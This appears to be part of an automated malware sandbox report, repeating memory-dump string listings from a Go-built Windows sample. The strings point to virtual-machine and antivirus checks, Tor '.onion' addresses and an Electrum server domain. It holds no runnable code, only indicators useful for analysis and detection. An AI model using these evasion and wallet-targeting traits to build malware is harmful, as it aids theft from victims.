                                                                                                                                • Instruction Fuzzy Hash: E851F5B46097158FD340EF65D18575EBBE0BF88708F818A2EF48887352DB389948DB96
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
                                                                                                                                • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
                                                                                                                                • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
                                                                                                                                • m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000021.00000002.401387176.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000021.00000002.403664259.00000000009F9000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000021.00000002.403771739.0000000000A59000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000021.00000002.405081350.0000000000C51000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000021.00000002.405104148.0000000000C55000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000021.00000002.405430643.0000000000CA8000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000021.00000002.405455302.0000000000CB6000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000021.00000002.405468680.0000000000CB9000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000021.00000002.405511934.0000000000CBB000.00000040.00020000.sdmp Download File
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
                                                                                                                                • API String ID: 0-626581767
                                                                                                                                • Opcode ID: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
                                                                                                                                • Instruction ID: 8241637a7f35ac624855d2df19fea6a5ed42779f520a2a5d8b1c8658a748f46b
                                                                                                                                • Opcode Fuzzy Hash: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
                                                                                                                                • Instruction Fuzzy Hash: 4551C7B4608705CFD344EF65D18575EBBE0BF88308F41886EE48887312D7799885CF9A
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Executed Functions

                                                                                                                                Non-executed Functions

                                                                                                                                Strings
                                                                                                                                • ,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
                                                                                                                                • bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
                                                                                                                                • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
                                                                                                                                • ", xrefs: 00428CF9
                                                                                                                                • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
                                                                                                                                • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000027.00000002.403499430.00000000009F9000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000027.00000002.404465966.0000000000C51000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000027.00000002.404493397.0000000000C55000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000027.00000002.404721533.0000000000CA8000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000027.00000002.404734345.0000000000CB6000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000027.00000002.404748669.0000000000CB9000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000027.00000002.404770210.0000000000CBB000.00000040.00020000.sdmp Download File
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
                                                                                                                                • API String ID: 0-2405844374
                                                                                                                                • Opcode ID: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
                                                                                                                                • Instruction ID: 42ee82367b21563e109480012d6fe3560eb94324b5bc2d8460cea0574e50dfb9
                                                                                                                                • Opcode Fuzzy Hash: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
                                                                                                                                • Instruction Fuzzy Hash: E851F5B46097158FD340EF65D18575EBBE0BF88708F818A2EF48887352DB389948DB96
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
                                                                                                                                • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
                                                                                                                                • m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
                                                                                                                                • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000027.00000002.403499430.00000000009F9000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000027.00000002.404465966.0000000000C51000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000027.00000002.404493397.0000000000C55000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000027.00000002.404721533.0000000000CA8000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000027.00000002.404734345.0000000000CB6000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000027.00000002.404748669.0000000000CB9000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000027.00000002.404770210.0000000000CBB000.00000040.00020000.sdmp Download File
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
                                                                                                                                • API String ID: 0-626581767
                                                                                                                                • Opcode ID: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
                                                                                                                                • Instruction ID: 8241637a7f35ac624855d2df19fea6a5ed42779f520a2a5d8b1c8658a748f46b
                                                                                                                                • Opcode Fuzzy Hash: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
                                                                                                                                • Instruction Fuzzy Hash: 4551C7B4608705CFD344EF65D18575EBBE0BF88308F41886EE48887312D7799885CF9A
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%